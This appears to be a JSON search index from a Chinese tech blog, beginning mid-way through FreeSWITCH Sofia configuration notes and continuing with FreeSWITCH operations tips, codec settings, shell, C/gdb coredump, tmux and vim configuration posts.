\u0026ldquo;false\u0026rdquo;. value=\u0026ldquo;true\u0026rdquo; is the most common use. Setting this value to \u0026ldquo;contact\u0026rdquo; will remove the old registration based on sip_user, sip_host and contact field as opposed to the call_id.\nmax-registrations-per-extension Defines the number of maximum registrations per extension. Valid value for this parameter is an integer greater than 0. Please note that setting this to 1 would counteract the usage of multiple-registrations. When an attempt to register an extension is made after the maximum value has been reached sofia will respond with 403. The following example will set maximum registrations to 2\ninbound-reg-force-matching-username Force the user and auth-user to match.\nforce-publish-expires Force custom presence update expires delta (-1 means endless)\nforce-register-domain all inbound registrations will look in this domain for the users. Comment out to use multiple domains\nforce-register-db-domain all inbound reg will stored in the db using this domain. Comment out to use multiple domains\nsend-message-query-on-register Can be set to \u0026rsquo;true\u0026rsquo;, \u0026lsquo;false\u0026rsquo; or \u0026lsquo;first-only\u0026rsquo;. If set to \u0026rsquo;true\u0026rsquo; (this is the default behavior), mod_sofia will send a message-query event upon registration. mod_voicemail uses this for counting messages.\nIf set to \u0026lsquo;first-only\u0026rsquo;, only the first REGISTER will trigger the message-query (it requires the UA to increment the NC on subsequent REGISTERs. Some phones, snom for instance, do not do this). The final effect of the message-query is to cause a NOTIFY MWI message to be sent to the registering UA (it is used to satisfy terminals that expect MWI without subscribing for it).\nunregister-on-options-fail If set to True with nat-options-ping the endpoint will be unregistered if no answer on OPTIONS packet.\nnat-options-ping With this option set FreeSWITCH will periodically send an OPTIONS packet to all NATed registered endpoints to keep alive connection. If set to True with unregister-on-options-fail the endpoint will be unregistered if no answer on OPTIONS packet.\nall-reg-options-ping With this option set FreeSWITCH will periodically send an OPTIONS packet to all registered endpoints to keep alive connection. If set to True with unregister-on-options-fail the endpoint will be unregistered if no answer on OPTIONS packet.\nregistration-thread-frequency Controls how often registrations in the FreeSWITCH are checked for expiration. ping-mean-interval Controls the mean interval FreeSWITCH™ will send OPTIONS packet to registered user, by default 30 seconds.\nSubscription force-subscription-expires force suscription expires to a lower value than requested\nforce-subscription-domain all inbound subscription will look in this domain for the users. Comment out to use multiple domains\nPresence manage-presence Enable presence. If you want to share your presence (see dbname and presence-hosts) set this to \u0026ldquo;true\u0026rdquo; on the first profile and enable the shared presence database. Then on subsequent profiles that share presence set this variable to \u0026ldquo;passive\u0026rdquo; and enable the shared presence database there as well.\ndbname Used to share presence info across sofia profiles Name of the db to use for this profile\npresence-hold-state By default when a call is placed on hold, monitoring extensions show that extension as ringing. You can change this behavior by specifying this parameter and one of the following values. Available as of commit 1145905 on April 13, 2012.\nconfirmed - Extension appears busy. early (default) - Extension appears to be ringing. terminated - Extension appears idle. presence-hosts A list of domains that have a shared presence in the database specified in dbname. People who use multiple domains per profile can\u0026rsquo;t use this feature anyway, so you\u0026rsquo;ll want to set it to something like \u0026ldquo;DISABLED\u0026rdquo; in this case to avoid getting users from similar domains all mashed together. For multiple domains also known as multi-tenant calling 1001 would call all matching users in all domains. Don\u0026rsquo;t use presence-hosts with multi-tenant.\npresence-privacy Optionally globally hide the caller ID from presence notes in distributed NOTIFY messages. For example, \u0026ldquo;Talk 1002\u0026rdquo; would be the presence note for extension 1001 while it is on a call with extension 1002. If the presence privacy tag is set to true, then it would distribute the presence note as \u0026ldquo;On The Phone\u0026rdquo; (without the extension to which it is connected). So any subscriber\u0026rsquo;s to 1001\u0026rsquo;s presence would not be able to see who he/she is talking to. http://jira.freeswitch.org/browse/FS-849 This also hides the number in the status \u0026ldquo;hold\u0026rdquo;, \u0026ldquo;ring\u0026rdquo;, \u0026ldquo;call\u0026rdquo; and perhaps others. http://jira.freeswitch.org/browse/FS-4420\nsend-presence-on-register Specify whether or not to send presence information when users register. Default is not to send presence information. Valid options:\nfalse true first-only CallerID Related options caller-id type choose one, can be overridden by inbound call type and/or sip_cid_type channel variable Remote-Party-ID header: P-*-Identity family of headers: neither one: pass-callee-id (defaults to true) Disable by setting it to false if you encounter something that your gateway for some reason hates X-headers that it is supposed to ignore\nOther (TO DO) hold-music disable-hold This allows to disable Music On Hold (added in GIT commit e5cc0539ffcbf660637198c698e90c2e30b05c2f, from Fri Apr 30 19:14:39 2010 -0500). This can be useful when the calling device intends to send its own MOH, but nevertheless sends a REINVITE to FreeSWITCH triggering its MOH. This can be done from dialplan also with rtp_disable_hold channel variable.\napply-inbound-acl set which access control lists, defined in acl.conf.xml, apply to this profile\napply-register-acl apply-proxy-acl This allows traffic to be sent to FreeSWITCH via one or more proxy servers. The proxy server should add a header named X-AUTH-IP containing the IP address of the client. FreeSWITCH trusts the proxy because its IP is listed in the proxy server ACL, and uses the value of the IP in this header as the client\u0026rsquo;s IP for ACL authentication (acl defined in apply-inbound-acl).\nrecord-template max-proceeding max number of open dialogs in proceeding\nbind-params if you want to send any special bind params of your own\ndisable-transfer disable transfer which may be undesirable in a public switch\nmanual-redirect enable-3pcc enable-3pcc determines if third party call control is allowed or not. Third party call control is useful in cases where the SIP invite doesn\u0026rsquo;t include a SDP (late media negotiation). enable-3pcc can be set to either \u0026rsquo;true\u0026rsquo; or \u0026lsquo;proxy\u0026rsquo;, true accepts the call right away, proxy waits until the call has been answered then sends accepts\nnonce-ttl TTL for nonce in sip auth\nThis parameter is set to 60 seconds if not set here. It\u0026rsquo;s used to determine how long to store the user registration record in the sip_authentication table. The expires field in the sip_authentication table is this value plus the expires set by the user agent.\nsql-in-transactions If set to true (default), it will instruct the profile to wait for 500 SQL statements to accumulate or 500ms to elapse and execute them in a transaction (to boost performance).\nodbc-dsn If you have ODBC support and a working dsn you can use it instead of SQLite\nmwi-use-reg-callid username If you wish to hide the fact that you are using FreeSWITCH in the SDP message (Specifically the o= and and s= fields) , then set the username param under the profile. This has no relation whatsoever with the username parameter when we\u0026rsquo;re dealing with gateways. If this value is left unset the system defaults using FreeSWITCH as the username parameter with the o= and s= fields.\nExample: . v=0. o=root 1346068950 1346068951 IN IP4 1.2.3.4. s=root. c=IN IP4 1.2.3.4. t=0 0. m=audio 26934 RTP/AVP 18 0 101 13. a=fmtp:18 annexb=no. a=rtpmap:101 telephone-event/8000. a=fmtp:101 0-16. a=ptime:20.\nwhen you set Directory of Users To allow users to register with the server, the user information must be specified in the conf/directory/default/*xml file. To dynamically specify what users can register, use Mod xml curl\nDefault Configuration File From the FreeSWITCH Github repository\u0026rsquo;s vanilla configurations ([conf/vanilla/autoload_configs/sofia.conf.xml](https://github.com/signalwire/freeswitch/blob/master/conf/vanilla/autoload_configs/sofia.conf.xml)): conf/autoload_configs/sofia.conf.xml \u0026lt;global_settings\u0026gt; \u0026lt;!\u0026ndash; the new format for HEPv2/v3 and capture ID protocol:host:port;hep=2;capture_id=200;\n\u0026ndash;\u0026gt; \u0026lt;/global_settings\u0026gt;\nshutdown and restart FreeSWITCH (or) unload and load mod_sofia If you\u0026rsquo;ve only made changes to a particular profile, you may simply (WARNING: will drop all calls associated with this profile):\nsofia profile restart reloadxml Security Features SIP TLS for secure signaling. SRTP for secure media delivery. The Auth section above for authentication settings. 参考 https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files ","permalink":"https://wdd.js.org/freeswitch/sofia-config/","summary":"About Sofia is a FreeSWITCH™ module (mod_sofia) that provides SIP connectivity to and from FreeSWITCH in the form of a User Agent. A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for handling a certain network protocol; the network protocol in Sofia\u0026rsquo;s case is SIP. Sofia is the general name of any User Agent in FreeSWITCH using the SIP network protocol. For example, Sofia receives calls sent to FreeSWITCH from other SIP User Agents (UAs), sends calls to other UAs, acts as a client to register FreeSWITCH with other UAs, lets clients register with FreeSWITCH, and connects calls (i.","title":"Sofia 模块全部配置"},{"content":"安装单个模块 make mod_sofia-install make mod_ilbc-install fs-cli事件订阅 /event plain ALL /event plain CHANNEL_ANSWER sofia 帮助文档 sofia help USAGE: -------------------------------------------------------------------------------- sofia global siptrace \u0026lt;on|off\u0026gt; sofia capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia profile \u0026lt;name\u0026gt; [start | stop | restart | rescan] [wait] flush_inbound_reg [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [reboot] check_sync [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [register | unregister] [\u0026lt;gateway name\u0026gt; | all] killgw \u0026lt;gateway name\u0026gt; [stun-auto-disable | stun-enabled] [true | false]] siptrace \u0026lt;on|off\u0026gt; capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia \u0026lt;status|xmlstatus\u0026gt; profile \u0026lt;name\u0026gt; [reg [\u0026lt;contact str\u0026gt;]] | [pres \u0026lt;pres str\u0026gt;] | [user \u0026lt;user@domain\u0026gt;] sofia \u0026lt;status|xmlstatus\u0026gt; gateway \u0026lt;name\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; sofia help -------------------------------------------------------------------------------- 开启消息头压缩 \u0026lt;param name=\u0026#34;enable-compact-headers\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt; fs需要重启\n呼叫相关指令 # 显示当前呼叫 show calls # 显示呼叫数量 show calls count # 挂断某个呼叫 uuid_kill 58579bd2-db78-4c7e-a666-0f16e19be643 # 挂断所有呼叫 hupall # sip抓包 sofia profile internal siptrace on sofia profile external siptrace on # 拨打某个用户并启用echo回音 originate user/1000 \u0026amp;echo 正则测试 在fs_cli里面可以用regex快速测试正则是否符合预期结果\nregex 123123 | \\d regex 123123 | ^\\d* 变量求值 eval $${mod_dir} eval $${recording_dir} 修改UA信息 sofia_external.conf.xml sofia_internal.conf.xml \u0026lt;param name=\u0026#34;user-agent-string\u0026#34; value=\u0026#34;wdd\u0026#34;/\u0026gt; \u0026lt;param name=\u0026#34;username\u0026#34; value=\u0026#34;wdd\u0026#34;/\u0026gt; 修改之后需要rescan profile.\nmod_distributor的两个常用指令 # reload distributor_ctl reload # 求值 eval ${distributor(distributor_list)} 自动接听回音测试 \u0026lt;extension name=\u0026#34;wdd_echo\u0026#34;\u0026gt; \u0026lt;condition field=\u0026#34;destination_number\u0026#34; expression=\u0026#34;^8002\u0026#34;\u0026gt; \u0026lt;action application=\u0026#34;info\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;action application=\u0026#34;answer\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;action application=\u0026#34;echo\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;/condition\u0026gt; \u0026lt;/extension\u0026gt; odbc-dsn配置错误,fs进入假死状态 最近遇到一个奇怪的问题,相同的fs镜像,在一个环境正常运行,但是再进入另一个环境的时候,fs进程运行起来了,但是所有的功能都异常,仿佛进入了假死状态。并且控制台的日志输出也没有什么有用的信息。\n后来,我想起来以前曾经遇到过这个问题。\n这个fs的镜像中没有编译odbc相关的依赖,但是看sofia_external.conf.xml和sofia_internal.conf.xml, 却有odbc相关的配置。\n\u0026lt;param name=\u0026#34;odbc-dsn\u0026#34; value=\u0026#34;....\u0026#34;\u0026gt; 所以只要把这个odbc-dsn的配置注释掉,fs就正常运行了。\n取消session-timer 某些情况下fs会对呼入的电话,在通过时长达到1分钟的时候,向对端发送一个re-invite, 实际上这还是一个invite请求,只是to字段有了tag参数。这个机制叫做session-timer, 具体定义在RFC4028中。\n但是某些SIP终端可能不支持re-invite, 然后不对这个re-invite做回应,或者回应了一个错误的状态码,都会导致这通呼叫异常挂断。\n在internal.xml中修改如下行:\n\u0026lt;param name=\u0026#34;enable-timer\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt; RTP失活超时检测 某个时刻开始,客户端无法再向FS发送流媒体了。例如客户端Web页面关闭,或者浏览器关闭。\n但是在这种场景下,FS还是会向客户端发送一段时间的媒体流,然后再发送BYE消息。那么,我们如何控制这个RTP失活的检测时间呢?\n在internal.xml或者external.xml中,有以下参数,可以控制检测RTP超时时间。\nrtp-timeout-sec rtp超时秒数 rtp-hold-timeout-sec rtphold超时秒数 \u0026lt;param name=\u0026#34;rtp-timeout-sec\u0026#34; value=\u0026#34;10\u0026#34;/\u0026gt; \u0026lt;param name=\u0026#34;rtp-hold-timeout-sec\u0026#34; value=\u0026#34;10\u0026#34;/\u0026gt; sofia profile internal restart\nfs 配置多租户分机 分机的相关配置都是位于conf/directory目录中, 我的directory目录中只有一个default.xml文件\n\u0026lt;include\u0026gt; \u0026lt;domain name=\u0026#34;123.cc\u0026#34;\u0026gt; \u0026lt;user id=\u0026#34;1000\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;user id=\u0026#34;1001\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;/domain\u0026gt; \u0026lt;domain name=\u0026#34;abc.cc\u0026#34;\u0026gt; \u0026lt;user id=\u0026#34;1000\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;user id=\u0026#34;1001\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;/domain\u0026gt; \u0026lt;/include\u0026gt; fs状态转移图 ","permalink":"https://wdd.js.org/freeswitch/tips/","summary":"安装单个模块 make mod_sofia-install make mod_ilbc-install fs-cli事件订阅 /event plain ALL /event plain CHANNEL_ANSWER sofia 帮助文档 sofia help USAGE: -------------------------------------------------------------------------------- sofia global siptrace \u0026lt;on|off\u0026gt; sofia capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia profile \u0026lt;name\u0026gt; [start | stop | restart | rescan] [wait] flush_inbound_reg [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [reboot] check_sync [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [register | unregister] [\u0026lt;gateway name\u0026gt; | all] killgw \u0026lt;gateway name\u0026gt; [stun-auto-disable | stun-enabled] [true | false]] siptrace \u0026lt;on|off\u0026gt; capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia \u0026lt;status|xmlstatus\u0026gt; profile \u0026lt;name\u0026gt; [reg [\u0026lt;contact str\u0026gt;]] | [pres \u0026lt;pres str\u0026gt;] | [user \u0026lt;user@domain\u0026gt;] sofia \u0026lt;status|xmlstatus\u0026gt; gateway \u0026lt;name\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; sofia help -------------------------------------------------------------------------------- 开启消息头压缩 \u0026lt;param name=\u0026#34;enable-compact-headers\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt; fs需要重启","title":"FS常用运维手册"},{"content":"查看FS支持的编码 show codec 编码设置 vars.xml\nglobal_codec_prefs=G722,PCMU,PCMA,GSM outbound_codec_prefs=PCMU,PCMA,GSM 查看FS使用的编码 \u0026gt; sofia status profile internal CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM \u0026gt; sofia status profile external CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM 使修改后的profile生效 \u0026gt; sofia profile internal rescan \u0026gt; sofia profile external rescan 重启profile \u0026gt; sofia profile internal restart \u0026gt; sofia profile external restart ","permalink":"https://wdd.js.org/freeswitch/media-settings/","summary":"查看FS支持的编码 show codec 编码设置 vars.xml\nglobal_codec_prefs=G722,PCMU,PCMA,GSM outbound_codec_prefs=PCMU,PCMA,GSM 查看FS使用的编码 \u0026gt; sofia status profile internal CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM \u0026gt; sofia status profile external CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM 使修改后的profile生效 \u0026gt; sofia profile internal rescan \u0026gt; sofia profile external rescan 重启profile \u0026gt; sofia profile internal restart \u0026gt; sofia profile external restart ","title":"FreeSWITCH 媒体相关操作"},{"content":"复制文本到剪贴板 sudo apt install xclip vim ~/.zshrc\nalias copy=\u0026#39;xclip -selection clipboard\u0026#39; 这样我们就可以用copy命令来考本文件内容到系统剪贴板了。\ncopy aaa.txt 判断工作区是否clean if [ -z \u0026#34;$(git status --porcelain)\u0026#34; ]; then # Working directory clean else # Uncommitted changes fi ","permalink":"https://wdd.js.org/posts/2022/05/shell-101/","summary":"复制文本到剪贴板 sudo apt install xclip vim ~/.zshrc\nalias copy=\u0026#39;xclip -selection clipboard\u0026#39; 这样我们就可以用copy命令来考本文件内容到系统剪贴板了。\ncopy aaa.txt 判断工作区是否clean if [ -z \u0026#34;$(git status --porcelain)\u0026#34; ]; then # Working directory clean else # Uncommitted changes fi ","title":"Shell 教程技巧"},{"content":"开启coredump #如果该命令的返回值是0,则表示不开启coredump ulimit -c # 开启coredump ulimit -c unlimited 准备c文件 #include\u0026lt;stdio.h\u0026gt; void crash() { char * p = NULL; *p = 0; } int main(){ printf(\u0026#34;hello world 1\u0026#34;); int phone [4]; phone[232] = 12; crash(); return 0; } 编译执行 gcc -g hello.c -o hello ./hello 之后程序崩溃,产生core文件。\ngdb分析 gdb 启动的二进制文件 core文件\ngdb ./hello ./core 之后输入: bt full 可以查看到更详细的信息\n➜ c-sandbox gdb ./hello ./core GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git Copyright (C) 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later \u0026lt;http://gnu.org/licenses/gpl.html\u0026gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \u0026#34;show copying\u0026#34; and \u0026#34;show warranty\u0026#34; for details. This GDB was configured as \u0026#34;arm-linux-gnueabihf\u0026#34;. Type \u0026#34;show configuration\u0026#34; for configuration details. For bug reporting instructions, please see: \u0026lt;http://www.gnu.org/software/gdb/bugs/\u0026gt;. Find the GDB manual and other documentation resources online at: \u0026lt;http://www.gnu.org/software/gdb/documentation/\u0026gt;. For help, type \u0026#34;help\u0026#34;. Type \u0026#34;apropos word\u0026#34; to search for commands related to \u0026#34;word\u0026#34;... Reading symbols from ./hello...done. [New LWP 25571] Core was generated by `./hello\u0026#39;. Program terminated with signal SIGSEGV, Segmentation fault. #0 0x0001045c in crash () at hello.c:6 6 *p = 0; (gdb) bt full #0 0x0001045c in crash () at hello.c:6 p = 0x0 #1 0x00010490 in main () at hello.c:13 phone = {66328, 0, 0, 0} ","permalink":"https://wdd.js.org/posts/2022/05/c-and-gdb/","summary":"开启coredump #如果该命令的返回值是0,则表示不开启coredump ulimit -c # 开启coredump ulimit -c unlimited 准备c文件 #include\u0026lt;stdio.h\u0026gt; void crash() { char * p = NULL; *p = 0; } int main(){ printf(\u0026#34;hello world 1\u0026#34;); int phone [4]; phone[232] = 12; crash(); return 0; } 编译执行 gcc -g hello.c -o hello ./hello 之后程序崩溃,产生core文件。\ngdb分析 gdb 启动的二进制文件 core文件\ngdb ./hello ./core 之后输入: bt full 可以查看到更详细的信息\n➜ c-sandbox gdb ./hello ./core GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git Copyright (C) 2016 Free Software Foundation, Inc.","title":"C和gdb调试"},{"content":"oh my tmux 关闭第二键ctrl-a ctrl-a可以用来移动光标到行首的,不要作为tmux的第二键\nset -gu prefix2 unbind C-a Tmux reload config :source-file ~/.tmux.conf tmux 显示时间 ctrl b + t tmux从当前目录打开新的窗口 bind \u0026#39;\u0026#34;\u0026#39; split-window -c \u0026#34;#{pane_current_path}\u0026#34; bind % split-window -h -c \u0026#34;#{pane_current_path}\u0026#34; bind c new-window -c \u0026#34;#{pane_current_path}\u0026#34; ","permalink":"https://wdd.js.org/posts/2022/05/tmux-faq/","summary":"oh my tmux 关闭第二键ctrl-a ctrl-a可以用来移动光标到行首的,不要作为tmux的第二键\nset -gu prefix2 unbind C-a Tmux reload config :source-file ~/.tmux.conf tmux 显示时间 ctrl b + t tmux从当前目录打开新的窗口 bind \u0026#39;\u0026#34;\u0026#39; split-window -c \u0026#34;#{pane_current_path}\u0026#34; bind % split-window -h -c \u0026#34;#{pane_current_path}\u0026#34; bind c new-window -c \u0026#34;#{pane_current_path}\u0026#34; ","title":"Tmux 常见问题以及解决方案"},{"content":"修改coc-vim的错误提示 coc-vim的错误提示窗口背景色是粉红,前景色是深红。这样的掩饰搭配,很难看到具体的文字颜色。\n所以我们需要把前景色改成白色。\n:highlight CocErrorFloat ctermfg=White 参考 https://stackoverflow.com/questions/64180454/how-to-change-coc-nvim-floating-window-colors\nvim go一直卡在初始化 有可能没有安装二进制工具\n:GoInstallBinaries neovim 光标变成细线解决方案 :set guicursor= ","permalink":"https://wdd.js.org/vim/vim-faq/","summary":"修改coc-vim的错误提示 coc-vim的错误提示窗口背景色是粉红,前景色是深红。这样的掩饰搭配,很难看到具体的文字颜色。\n所以我们需要把前景色改成白色。\n:highlight CocErrorFloat ctermfg=White 参考 https://stackoverflow.com/questions/64180454/how-to-change-coc-nvim-floating-window-colors\nvim go一直卡在初始化 有可能没有安装二进制工具\n:GoInstallBinaries neovim 光标变成细线解决方案 :set guicursor= ","title":"Vim 常见问题以及解决方案"},{"content":"我承认,vscode很香,但是vim的开发方式也让我无法割舍。\nvscode中有个vim插件,基本上可以满足大部分vim的功能。\n这里我定义了我在vim常用的leader快捷键。\n设置,为默认的leader \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, 在Normal模式能comand+c复制 \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, leader快捷键 在插入模式安jj会跳出插入模式 ,a: 跳到行尾部,并进入插入模式 ,c: 关闭当前标签页 ,C: 关闭其他标签页 ,j: 跳转到左边标签页 ,k: 跳转到右边标签页 ,w: 保存文件 ,t: 给出提示框 ,b: 显示或者隐藏文件树窗口 完整的配置 \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, \u0026#34;vim.insertModeKeyBindings\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;j\u0026#34;, \u0026#34;j\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;\u0026lt;Esc\u0026gt;\u0026#34; ] } ], \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, \u0026#34;vim.normalModeKeyBindingsNonRecursive\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;a\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;A\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;c\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.closeActiveEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;C\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.closeOtherEditors\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;j\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.previousEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;k\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.nextEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;w\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.files.save\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;t\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;editor.action.showHover\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;b\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.toggleSidebarVisibility\u0026#34; ] }, ] ","permalink":"https://wdd.js.org/vim/vscode-vim/","summary":"我承认,vscode很香,但是vim的开发方式也让我无法割舍。\nvscode中有个vim插件,基本上可以满足大部分vim的功能。\n这里我定义了我在vim常用的leader快捷键。\n设置,为默认的leader \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, 在Normal模式能comand+c复制 \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, leader快捷键 在插入模式安jj会跳出插入模式 ,a: 跳到行尾部,并进入插入模式 ,c: 关闭当前标签页 ,C: 关闭其他标签页 ,j: 跳转到左边标签页 ,k: 跳转到右边标签页 ,w: 保存文件 ,t: 给出提示框 ,b: 显示或者隐藏文件树窗口 完整的配置 \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, \u0026#34;vim.insertModeKeyBindings\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;j\u0026#34;, \u0026#34;j\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;\u0026lt;Esc\u0026gt;\u0026#34; ] } ], \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, \u0026#34;vim.normalModeKeyBindingsNonRecursive\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;a\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;A\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;c\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.","title":"vscode vim插件自定义快捷键"},{"content":"neovim如何与系统剪贴板交互? neovim和系统剪贴板的交互方式和vim的机制是不同的,所以不要先入为主的用vim的方式使用neovim。\nneovim需要外部的程序与系统剪贴板进行交互,参考:help clipboard\nneovim按照如下的优先级级方式选择交互程序:\n- |g:clipboard| - pbcopy, pbpaste (macOS) - wl-copy, wl-paste (if $WAYLAND_DISPLAY is set) - xclip (if $DISPLAY is set) - xsel (if $DISPLAY is set) - lemonade (for SSH) https://github.com/pocke/lemonade - doitclient (for SSH) http://www.chiark.greenend.org.uk/~sgtatham/doit/ - win32yank (Windows) - termux (via termux-clipboard-set, termux-clipboard-set) - tmux (if $TMUX is set) 因为我的操作系统是linux, 所以方便的方式是直接安装xclip。\nsudo pacman -Syu xclip 两个系统剪贴板有何不同? 对于windows和mac来说,只有有一个系统剪贴板,对于linux有两个。\n剪贴板,鼠标选择剪贴板 剪贴板,选择之后复制剪贴板 如下图,我用鼠标选择了12345, 但是没有按ctrl + c, 这时候你打开nvim, 执行:reg, 可以看到注册器\n\u0026#34;* 12345 如果按了ctrl + c\n\u0026#34;* 12345 \u0026#34;+ 12345 所以,在vim中如果想粘贴系统剪贴板中的内容,可以是用 C-R * 或者 C-R +\n如何把vim buffer中的全部内容复制到系统剪贴板? :%y+ ","permalink":"https://wdd.js.org/vim/clipboard/","summary":"neovim如何与系统剪贴板交互? neovim和系统剪贴板的交互方式和vim的机制是不同的,所以不要先入为主的用vim的方式使用neovim。\nneovim需要外部的程序与系统剪贴板进行交互,参考:help clipboard\nneovim按照如下的优先级级方式选择交互程序:\n- |g:clipboard| - pbcopy, pbpaste (macOS) - wl-copy, wl-paste (if $WAYLAND_DISPLAY is set) - xclip (if $DISPLAY is set) - xsel (if $DISPLAY is set) - lemonade (for SSH) https://github.com/pocke/lemonade - doitclient (for SSH) http://www.chiark.greenend.org.uk/~sgtatham/doit/ - win32yank (Windows) - termux (via termux-clipboard-set, termux-clipboard-set) - tmux (if $TMUX is set) 因为我的操作系统是linux, 所以方便的方式是直接安装xclip。\nsudo pacman -Syu xclip 两个系统剪贴板有何不同? 对于windows和mac来说,只有有一个系统剪贴板,对于linux有两个。\n剪贴板,鼠标选择剪贴板 剪贴板,选择之后复制剪贴板 如下图,我用鼠标选择了12345, 但是没有按ctrl + c, 这时候你打开nvim, 执行:reg, 可以看到注册器","title":"和系统剪贴板进行交互"},{"content":"在vscode中,可以选中一个目录,然后在目录中搜索对应的关键词,再查找到对应文件中,然后做替换。\n在vim也可以这样做。\n但是这件事要分成两步。\n根据关键词,查找文件 对多个文件进行替换 搜索关键词 搜索关键词可以用grep, 